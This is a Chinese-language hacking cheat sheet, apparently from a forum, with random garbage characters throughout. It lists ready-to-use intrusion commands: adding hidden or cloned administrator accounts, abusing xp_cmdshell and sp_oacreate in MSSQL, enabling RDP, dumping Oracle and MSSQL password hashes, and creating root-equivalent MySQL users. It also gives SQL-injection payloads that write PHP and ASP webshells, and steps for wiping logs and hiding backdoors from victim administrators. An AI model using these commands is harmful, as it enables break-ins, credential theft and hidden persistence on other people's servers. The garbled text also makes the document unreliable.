0 N- \& Y9 V' C: O! ^! {
1.net user administrator /passwordreq:no
' W/ Q+ ?. d' G& r这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了& d: X& z- S$ C1 M# U$ j+ x6 p0 ]; i
2.比较巧妙的建克隆号的步骤* ?7 [* @; n w4 \6 R4 F8 h
先建一个user的用户
1 u# `3 y' a3 }+ x& u然后导出注册表。然后在计算机管理里删掉
$ k3 D& M, i' N在导入,在添加为管理员组! \0 b; i* A! J: ?4 o
3.查radmin密码
" a. q: t1 O4 p$ X; mreg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
, |( z, P2 {0 l1 ? O/ i4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options] ?6 N$ k$ s) S% u( N9 @
建立一个"services.exe"的项: `8 M/ C4 O$ {( t; M2 |' }; L
再在其下面建立(字符串值)+ W& ~# {6 M+ F/ Q# m# R6 m# R
键值为mu ma的全路径; c4 M) F2 y5 b& d
5.runas /user:guest cmd
: Z* |" t4 ~+ ?+ ~测试用户权限!' I5 O) Y& c1 |/ a3 T# k
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?3 \' b* g7 l! W' ~8 Z+ K9 S
7.入侵后漏洞修补、痕迹清理,后门置放:
" ?: y" W0 B% |基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门0 g, h" J! V$ g" X5 K1 a( v7 [
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
) `8 |: t( E7 ?) c- r7 {5 U% _! _4 \* l
. }& m+ ~+ H) i1 {3 cfor example
4 N' O- R9 K. u: A4 p2 D" Y- S( J- R5 S8 ?3 h/ r* ~ q0 Y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'4 M- y4 u+ }8 j6 h; C
7 k* t* u" Z8 I2 D( j! x! y, `: S1 U
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'3 N, ~ ?3 b4 J+ e6 H6 w
8 b6 Z$ e4 t2 \4 V' V: j9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
" R+ f8 ]' c- s* w( Y/ g' M5 B: U如果要启用的话就必须把他加到高级用户模式. w1 a4 p$ g4 x- p n
可以直接在注入点那里直接注入
3 ?+ Z& V* l9 m u' Mid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
( o" _% l+ f2 _9 Q# T( k! H然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
2 F" O5 Z! I8 U g8 l: I5 y或者1 ^- n* M+ {" m8 M
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
/ s/ i9 Z$ @, R1 F8 l, U% }9 F6 ~来恢复cmdshell。
8 Y; R( G C) X3 y* q5 d3 x' H, Z! R; R4 |
分析器5 J, L6 f& g* l& y! p! V: Q1 ~
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
# M, E* ?4 o! j' S b' d" e然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll"), O6 s; b/ d" [: N8 V s, B. l
10.xp_cmdshell新的恢复办法$ d' v d5 c" F; p& c" Q) l' y
xp_cmdshell新的恢复办法+ }+ P8 |7 L/ `3 d7 e7 j
扩展储存过程被删除以后可以有很简单的办法恢复:
# B4 `/ _& O) _: l+ Q删除6 [8 F$ Y% a) i" }6 t# Y! J
drop procedure sp_addextendedproc
8 [4 Q# v) N& T& H9 Ydrop procedure sp_oacreate
$ J% n+ }% Q) |7 ~) w; `exec sp_dropextendedproc 'xp_cmdshell'& U, t! U8 [* @. d/ Z
G0 f/ e4 V% T4 h
恢复
1 ?" g$ ~8 z! s6 T# y9 Xdbcc addextendedproc ("sp_oacreate","odsole70.dll"): N6 _& w& S$ X5 W
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")' {$ ?* C9 J+ N; p% B' E& B, j
0 m+ \: A* u+ v! P$ o' c- G; i
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
$ S5 C" u4 _1 j- ~3 Z4 r
: g# E2 k* V7 p, k# G& y( `/ |-----------------------------8 e8 N) p7 ^- j
( }/ u. w: z: q9 K( |) H1 ]8 N$ e删除扩展存储过过程xp_cmdshell的语句:
5 g) j& n/ e: i6 c) N! zexec sp_dropextendedproc 'xp_cmdshell'
' h) }' b1 P3 p9 t: D
/ j2 N6 u/ o* m* ~( N3 M' d8 O7 A$ M恢复cmdshell的sql语句3 o) f9 v6 t/ O, L+ J: T% }# H! m" y
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'9 m: K6 I$ J" W: V' w5 q' d: }
, E1 k& u) o; A' Y ]5 P, {5 K; T. ?! M# I9 _ U+ l9 p$ x6 @
开启cmdshell的sql语句
: Y1 G* b3 D$ H5 B9 Z
: t, I* f, y* eexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'$ x3 Z( k2 J3 l6 b/ J4 y: g
; I. S7 Z% L! |9 r! l. V+ t7 L- T
判断存储扩展是否存在
0 S3 ^1 Q4 I H7 D5 o4 ~, cselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'- g& t8 d8 M s
返回结果为1就ok: ?# s) K+ q l( V/ m4 ?6 N2 I
! O1 s- W% c; t4 }: i7 e2 |0 ~
恢复xp_cmdshell4 Q" E6 T, {$ _- F' r K! ^1 {
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'$ m8 X/ R- ?1 C' q
返回结果为1就ok' w- ]& \) y9 o; K' t0 n
$ A+ w5 u$ l- @0 J+ t' f$ @
否则上传xplog7.0.dll
. e: a8 K6 g- M( O; J* S% W5 }% ^exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
$ j$ d( F$ f: y- d, _9 T- l2 c- P5 v* S! w
堵上cmdshell的sql语句
$ |, g6 b2 j& ~$ e8 y7 fsp_dropextendedproc "xp_cmdshel
4 t) l5 f; ~& |0 P; b-------------------------
3 o, e" S X. ?6 H: h9 ~清除3389的登录记录用一条系统自带的命令:
3 c, ^6 ~ D6 J1 R/ ^% Rreg delete "hkcu\Software\Microsoft\Terminal Server Client" /f; z% h8 ^% P. N( x, G) O) D
$ q7 @- q: M# u
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件& C4 B9 m! G; N5 N
在 mysql里查看当前用户的权限
& u9 N& Z7 c% wshow grants for
: x! E* |1 i9 d* ~3 @7 P( t K6 L* ]( @* k2 z, V5 p
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。+ O8 S1 {& E( I$ q0 @; _! y8 h
$ c# P5 @" A1 j7 p6 T& p0 D8 M: V$ t& L% h* T. M: b
Create USER 'itpro'@'%' IDENTIFIED BY '123'; m, b8 X7 ] j: y: r" ]
+ i3 f+ v7 C) w$ E* `. OGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
9 ?6 d0 W5 j6 }9 l% |) r' j6 G/ X `: n9 W! X
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0- N. b* F; l; P+ P! j& I4 G# D
5 y( n# \; D+ o' {) l& OMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0; n; h: {) W2 x; m0 G
7 m$ l% J2 M- I# W5 f搞完事记得删除脚印哟。
5 h# T: p1 x$ L7 g; g. R, v2 d
( B3 i0 ~; x$ x4 t0 o9 ZDrop USER 'itpro'@'%';9 y" j- K4 L2 X1 G/ ^; M
' j! ~! p: p' `( E0 GDrop DATABASE IF EXISTS `itpro` ;
3 j( X0 ^ y5 d. Z6 c# x7 b) Y& b4 @/ O8 L6 e9 ^
当前用户获取system权限0 G9 u' F: ?8 C. z$ L4 G- z- J$ A
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
D+ t5 e- \3 jsc start SuperCMD
& M9 a& K: R0 Y" {" L- o* f( Q程序代码5 b4 z! c; w0 r4 g1 T! ]' Y
<SCRIPT LANGUAGE="VBScript">
9 e# V2 }% M7 `; P. H( m# F4 Q# tset wsnetwork=CreateObject("WSCRIPT.NETWORK"); w3 j+ Z$ N0 ~' X, d* `
os="WinNT://"&wsnetwork.ComputerName
6 w3 q, _9 }( j; \Set ob=GetObject(os)( C* h( u# G T+ i$ ]
Set oe=GetObject(os&"/Administrators,group")
, C1 Y4 a) \5 F9 x' WSet od=ob.Create("user","nosec")( }5 r, t2 d6 C ?
od.SetPassword "123456abc!@#"
5 Z# U! ^8 Z+ n: b0 u( S. qod.SetInfo' Z7 S1 Y1 [5 u, f( M9 q. Q
Set of=GetObject(os&"/nosec",user)
9 w4 V% N: p& J- \ u5 zoe.add os&"/nosec"
& }; W& |; q4 B, A, B# G5 ~</Script>. E; `' ~! L9 O+ o% }8 O ~
<script language=javascript>window.close();</script>: k8 S6 G/ v6 `6 S$ P3 E- {; ~
9 G) W4 U! e9 H9 d8 k/ O% P# i( U# `6 s4 u) J) j( K
. |2 q1 w" y4 E0 M* F9 [+ }6 t; \9 Z! o7 j. A! n4 i) s' u& L
突破验证码限制入后台拿shell, @& c8 ~: f( f: L* `: t' \7 B
程序代码# N. V! h7 ^& C" M/ B
REGEDIT4 ) F: @2 f0 ^8 A# @9 ^# u# A" ^: P
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
. X7 F) W5 e2 V8 \1 P"BlockXBM"=dword:00000000% z6 k( N+ t1 I
0 e% v4 ^$ x. t2 u% b1 x7 s, M6 q保存为code.reg,导入注册表,重器IE2 g$ w4 s. Q: G& _5 ]
就可以了 Q" n* o1 s# z6 e% V7 F# c
union写马$ h7 }4 k8 t0 t1 k' L
程序代码+ @( F7 {! H, P* v& K
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*6 f& z. ]: j1 A, n
2 b$ T) v4 q& J: F5 P7 u0 q" V应用在dedecms注射漏洞上,无后台写马! j3 O- P3 c$ D9 f U& w. L
dedecms后台,无文件管理器,没有outfile权限的时候: Z, @" x1 @3 A+ A1 P* O
在插件管理-病毒扫描里1 K; M& {, e/ J4 _. q+ q; f1 _
写一句话进include/config_hand.php里6 s7 z& X. G9 L, H$ M
程序代码0 Z+ G) S( B6 W6 |7 H3 Y# _% s' i
>';?><?php @eval($_POST[cmd]);?>
- O. i% n8 ~/ z, a7 i( I3 T' @6 H- ?! p& e
$ Q' A. E d+ Y$ s9 U8 P如上格式
0 y" j# P4 O5 G' g1 i! ]& y
) _' P3 r1 d# T! N' T# Z& Doracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解0 s5 n* ^8 Y! d( a& H# `6 H ~
程序代码
3 P m! l: e( Qselect username,password from dba_users;
8 F0 A1 N1 U! b
! l2 ^5 x) k1 X% f5 [4 a* p7 `$ `- _4 M9 m3 x* L+ B# H. U
mysql远程连接用户
7 s* Y: M5 P" }( ]+ ]程序代码1 w( Y! J3 L; R2 U
9 F2 c& x- G0 ~4 V( }( l3 E f: w
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
, [& t! c* H2 ]( [1 y7 ]GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION. x, N. j; U) r1 Z+ i4 N& S" l8 \4 f
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
" w$ p+ K) h m5 K* [$ iMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;. E' v) }% `, s V& a) e( L/ s
+ R& k N* w1 q7 |# Y9 M7 g$ G
1 Z9 U( ]: C% [0 S# Y( l
" R5 j" B N+ s4 \& V" B
7 r+ ~( y9 B' c- t9 kecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
/ n+ l% j) u* Z, h L/ ]6 L& l6 F M; c1 o% ^! i
1.查询终端端口
% Y L' a* _0 y& l; k6 a' E) N/ }' J
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber @1 @9 o# {4 |" X* F! g
3 D$ ~+ F( y( S' U$ R
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
: H2 B& s, a# y5 G0 ttype tsp.reg: ~* Z) M. X" E0 O& ~/ u& n
- D6 u' M' E" U8 i8 w
2.开启XP&2003终端服务% _+ C( v* d9 b+ c. [
[$ P/ F( Q4 R1 l6 `8 y
J" j7 G8 c( I, YREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
2 q$ c# O# f/ z+ w2 I+ Z6 g1 }. F2 \2 W, Z7 s2 P4 e: j
4 A2 ~/ F! o: f' |REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f1 f: g+ @: u# O" O5 c# l
, y O( U6 o' \0 v" }8 K3.更改终端端口为20008(0x4E28)
$ J8 q2 M6 H. k) r; H7 x/ ^2 d/ q& @. y- ^6 B; p( z
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
0 o3 z+ E" R' Y& u) C* F3 I; i- D
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
1 P* c; F* K% d- l
' l! _( h' K& m8 M% ^4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
; Z! d) p( Q: L9 i, r. {0 z' `9 n% H2 ]# ]' h) B
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f7 h' }7 \# W' C! y( q2 ?
6 u" }( f, q- F9 j- T
% B0 {' h5 j4 Z6 l3 i
5.开启Win2000的终端,端口为3389(需重启)
4 r$ @& r' T$ e/ [/ s8 ]; [' N, P) D5 e+ t* r0 O- M( w
echo Windows Registry Editor Version 5.00 >2000.reg 0 @* U. D' p8 W+ _
echo. >>2000.reg
# D% l( J7 U7 e# ]. k7 Wecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg + P: N: ~4 L( V1 i/ e" d
echo "Enabled"="0" >>2000.reg 8 y5 n ^& j/ ~( D
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg . C2 s, g/ h9 e8 N+ y$ Y3 g2 V8 v
echo "ShutdownWithoutLogon"="0" >>2000.reg ; y* T. ?0 Y# m5 _4 u- [4 q
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg 1 ^, V2 ~0 g6 I+ N7 R8 E) n
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg 8 S% t! j' U5 ~* r0 m/ w4 D
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg ) L+ [0 @+ w5 e5 @
echo "TSEnabled"=dword:00000001 >>2000.reg * N' b2 A" _# ^, [
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg 4 Q9 F; B( L2 X- h3 T
echo "Start"=dword:00000002 >>2000.reg $ r( A# @2 t7 i k
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
9 |3 r2 A2 X( q3 {% Cecho "Start"=dword:00000002 >>2000.reg
2 @+ f. d, w( c' {0 hecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
6 {& {' `' r' k0 {4 K+ f5 Q+ Xecho "Hotkey"="1" >>2000.reg 7 x7 S( \& Z; _, V* N
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
% \! }% P+ J, \: W3 yecho "ortNumber"=dword:00000D3D >>2000.reg 3 O! x& K, W0 `3 s8 L+ c; ]% \
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg ( t' m8 _6 t! Q0 X" d
echo "ortNumber"=dword:00000D3D >>2000.reg
( F3 i7 A) ~: ~; Z0 w0 A0 ]
' H& n+ B8 ]& l6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
: n2 \, k! C, S
( L9 P; f# e3 M@ECHO OFF & cd/d %temp% & echo [version] > restart.inf" Y- O, F' Z" ^, r$ U& s
(set inf=InstallHinfSection DefaultInstall)
/ e8 ~8 g7 ~. b! J, Vecho signature=$chicago$ >> restart.inf
4 G" {* H' ^& q# U, eecho [defaultinstall] >> restart.inf
" w A/ X" J6 \/ Srundll32 setupapi,%inf% 1 %temp%\restart.inf; o# P) c4 i) B p1 @
' r% b( c5 v) I+ J$ p
3 Z n4 ?: }2 }9 J7.禁用TCP/IP端口筛选 (需重启)3 {& I! ?' C- C
# M$ Z2 Q$ \8 E3 Z& K9 JREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f" K1 F! T% Z) {# _5 V c3 ]
. ^6 {$ k' J7 O$ S5 X5 L; t8.终端超出最大连接数时可用下面的命令来连接
1 K& u4 J- b. W L
`. _: g+ B( d; imstsc /v:ip:3389 /console4 y! r2 d m q8 G- e8 S5 M
4 m/ S- t6 y$ m7 m$ f4 G0 C) m# J9.调整NTFS分区权限+ g \( s; Z0 y
# Z. m. o2 n4 G+ g1 [5 V
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)/ Y( E/ G4 s4 D$ b
, c% u; l. |& A& B
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
- j Y# P9 N% e0 D2 ?( Z6 Q2 B
) S& T. K, [' t; F+ B% T0 j------------------------------------------------------
9 d# S, `: Q# y3 J3389.vbs $ Y: G; d- o/ U
On Error Resume Next
' }9 _$ W6 P: h/ p! {1 cconst HKEY_LOCAL_MACHINE = &H800000028 U0 _5 X2 T+ D. z7 C
strComputer = "."
+ O# j! b' K1 d6 f B2 LSet StdOut = WScript.StdOut
/ A5 O5 J) x% tSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_$ k( F/ ]0 d. G3 r" O
strComputer & "\root\default:StdRegProv")9 S, ^& g6 `' Z# ^0 i; S+ i% e* A
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
& P7 b) \+ y* C" Z" woreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
7 g; L. k3 w2 l3 D6 o7 PstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"; @7 a$ L; @7 d4 Y+ w" ]5 P- ~
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath! ? F9 P8 V5 l/ d
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
$ _- }0 S, {. z5 B" b9 L. ]% istrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
% C' S" Z: R' NstrValueName = "fDenyTSConnections"+ Z+ ~) N: P! {0 v( z. r( O
dwValue = 0
, X" u+ _3 m7 M3 Woreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
/ y$ p6 @ [5 k4 s/ _. b6 TstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
4 D# t1 w! [$ ?- s: Y: L8 mstrValueName = "ortNumber"! \7 m* i2 \& D: w8 k
dwValue = 3389) W6 P m1 O- V/ m; P. I( s5 l8 T
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue3 z5 o7 `! q3 v: Z- X% W
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
, v3 s0 u( p; {1 D- a- MstrValueName = "ortNumber"
% j! W, R, d; K+ OdwValue = 3389& m5 k3 `) Q4 a' W8 O
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue* [* N; x% J6 v* f
Set R = CreateObject("WScript.Shell")
3 |3 A/ h/ U$ d! L! dR.run("Shutdown.exe -f -r -t 0")
! [1 g* G# X' R2 `/ [
; c7 G. j1 b: y. f0 m8 Q删除awgina.dll的注册表键值
5 {7 Q" q2 }( o4 d4 F+ [1 N程序代码: ?. u& _9 r2 I( {6 L
7 @! L5 M, D7 ^, |reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f. F, a# k! p' Z2 v5 l3 H
% C4 B' f/ x: ]
: K9 q/ s) |! S- A+ `
. F& Y( I" u$ J; ~5 ^0 Y) x& j& B9 Z' O1 M4 r
程序代码$ z" O4 k5 F) `0 q
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash( {, ^+ f+ E$ S; |; q
- M6 R5 C) j# K2 m& ^
设置为1,关闭LM Hash U* A5 Y$ s# |
* H8 k) Y5 [5 o" V7 h数据库安全:入侵Oracle数据库常用操作命令: e. y1 M( R N% C; j5 W0 v8 ?
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
( D& }/ r/ n# L) Q1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。9 {+ C! B. U4 C3 {; q9 E
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
7 K6 ^: _" `% i3、SQL>connect / as sysdba ;(as sysoper)或
: T! F+ k7 D9 H( t" tconnect internal/oracle AS SYSDBA ;(scott/tiger)
8 ~8 M4 i' o, v! q; D; }' Zconn sys/change_on_install as sysdba;& b& k w( B2 v* x9 P
4、SQL>startup; 启动数据库实例
; V6 j1 q- t6 w' e7 c0 s. B/ K$ \6 K5、查看当前的所有数据库: select * from v$database;
( U# [8 W2 N$ c1 Y6 p: qselect name from v$database;
) E; V- W% X& }6、desc v$databases; 查看数据库结构字段
# k9 B" F2 f& ?; |: z. h8 w7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
w9 X- P( }. Y* fSQL>select * from V_$PWFILE_USERS;
; o3 I! w. C8 i: KShow user;查看当前数据库连接用户7 n/ O& v" m) i2 k1 {2 L' l7 u
8、进入test数据库:database test;) S+ q# W3 R$ I
9、查看所有的数据库实例:select * from v$instance;" E5 N; r( D+ Z( P" w6 z- t
如:ora9i
: K# s9 q. Z( t7 D* M10、查看当前库的所有数据表:6 d7 U. j0 E. i
SQL> select TABLE_NAME from all_tables;3 |& V- @: P2 j; u) e
select * from all_tables;6 S) t/ x% s- L! I
SQL> select table_name from all_tables where table_name like '%u%';
' R( i. |7 F- W$ pTABLE_NAME
4 l5 r6 Y! W- \. F------------------------------
% [ q) S1 v' B- R u* \- U8 A! L* `_default_auditing_options_1 R( \- V! u& O0 K; q4 r
11、查看表结构:desc all_tables;
. ~" T. x, U( i' V! j! U12、显示CQI.T_BBS_XUSER的所有字段结构:; ~2 x0 H { s
desc CQI.T_BBS_XUSER;( ?' T6 F# ]4 x. u) @
13、获得CQI.T_BBS_XUSER表中的记录:
# o N$ i$ \6 E0 v1 r. P4 Yselect * from CQI.T_BBS_XUSER;( P ?/ n; \* p l b$ w4 }+ T4 }; _
14、增加数据库用户:(test11/test)( S* S; q J# X$ {0 |- K
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
: [$ q& O, B# j9 t15、用户授权:7 E! k& L. ~* i- f, a( F1 }
grant connect,resource,dba to test11;
. `4 {+ F/ z! k; l3 ]grant sysdba to test11;
1 }0 a% N' d% Y1 M. J5 Jcommit;
3 a% [, M$ n( y16、更改数据库用户的密码:(将sys与system的密码改为test.)
0 L% k6 K% ^1 B. S- D# {1 a2 Nalter user sys indentified by test;8 o, s+ Y7 C3 k1 _9 @* z- `3 F2 S
alter user system indentified by test;: v. [- u5 G) d1 a
+ J W: p# b: ~applicationContext-util.xml
9 t& A) G* y- s! lapplicationContext.xml. t& V: E, w [& D
struts-config.xml6 p5 [- L, _" B- x+ @
web.xml: x6 W* [3 A2 \" W/ x: J
server.xml: b9 y5 i7 z1 N! s
tomcat-users.xml: A/ Y) g1 ~9 v0 j" i" e
hibernate.cfg.xml
& V' x% W6 g o0 l; ydatabase_pool_config.xml
! B2 h3 k/ I; E1 d. K
* \0 i) G9 D( r, [, o5 a- x( ?( [3 @# S) U; k7 b
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置; U) \/ ? t, B- Y" v; m
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
( E1 W1 _, A$ j9 D\WEB-INF\struts-config.xml 文件目录结构5 k6 d6 b- W$ L; i) g
6 g5 H! { R$ Fspring.properties 里边包含hibernate.cfg.xml的名称3 M4 G+ I& |% d( N3 E
( L5 `' |2 ], _ X
j- B! `% E9 ]) v3 gC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
2 ]/ a% d0 N& f" R9 {3 t2 E7 [% I+ h8 w9 Y' Z3 \
如果都找不到 那就看看class文件吧。。
4 ?: ^+ w! P7 J5 f, x( |3 f: K) p4 V: L* W
测试1:
6 O8 r- h5 X9 \3 a5 c- DSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
% z% S5 q* G9 m1 A! ? P: k! D
X, }, m! `) \! D& w8 W测试2:
5 M. c3 m7 T3 A0 J- _4 H3 a) L; o# R2 _+ {4 \; j
create table dirs(paths varchar(100),paths1 varchar(100), id int) r: b: X# I3 Q- q
8 F! w4 [+ K, [+ V! b/ |
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--2 O" B0 v3 @* o1 R. E6 V9 U& A
- x5 i) Y, i- J/ a
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t16 o: S/ C# X Y, O% k0 @
- C& A( K: ]- D5 n5 } e% Q6 B& N查看虚拟机中的共享文件:; Q9 a) ^9 P+ ~8 r+ k
在虚拟机中的cmd中执行1 Q8 K$ G0 Q, a6 q; S& O
\\.host\Shared Folders% y( y( P2 v4 } A5 b) Z
9 A! K# K' C; x$ X8 R% T+ U
cmdshell下找终端的技巧
; N. H5 ^* I. z7 _# Q6 K1 n找终端:
+ @ R# a) D9 o& V( o第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
8 {/ `6 O0 ^- Q5 h 而终端所对应的服务名为:TermService 1 A! o5 c: @ e1 c' ?) Y, F
第二步:用netstat -ano命令,列出所有端口对应的PID值! ! S( i) H' c5 c
找到PID值所对应的端口
5 W0 q# U6 L9 l+ z& g: {7 ^8 e! v2 i9 D) S3 G& j
查询sql server 2005中的密码hash0 q# B. y, g2 b
SELECT password_hash FROM sys.sql_logins where name='sa'
' J6 J6 o) E6 L2 w2 e: [SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a& _& ]0 T# A6 x6 B
access中导出shell
3 i" C' c' f' W% g& B6 I- N( k N1 g6 l) G9 a( q
中文版本操作系统中针对mysql添加用户完整代码:
: ~( Z% e. }/ s( }1 Z* \; {+ Z2 M7 u/ Y3 h. Q) Z2 u7 t
